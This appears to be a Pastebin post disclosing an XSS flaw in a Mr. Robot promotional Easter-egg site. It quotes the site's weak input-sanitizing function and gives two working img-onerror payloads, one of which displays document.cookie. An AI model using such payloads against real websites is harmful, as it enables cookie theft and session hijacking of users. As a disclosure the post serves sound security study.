Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Season 2, Episode 6 Mr. Robot Easter egg has an XSS vulnerability. FSociety wrote a weak
- function for sanitizing user-input into their virtuel shell ;)
- The Easter-egg can be accessed here:
- http://l4713116.e-corp-usa.com/x/
- The sanitize function:
- function cleanInput(e){return tmp=striptags(e),tmp.replace(/<[^>]+>/gi,"").replace(/<script.*<\/script>/gi,"").replace(/<>/gi,"")
- XSS Payload:
- "0xUID <3's Mr. Robot":
- '">><marquee><img src=mrrobot onerror=confirm(String.fromCharCode(48,120,85,73,68,32,60,51,39,115,32,77,114,46,32,82,111,98,111,116))></marquee>">
- Alert dialog displaying the user's cookie:
- '">><marquee><img src=mrrobot onerror=confirm(document.cookie)></marquee>">
- @0xUID
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement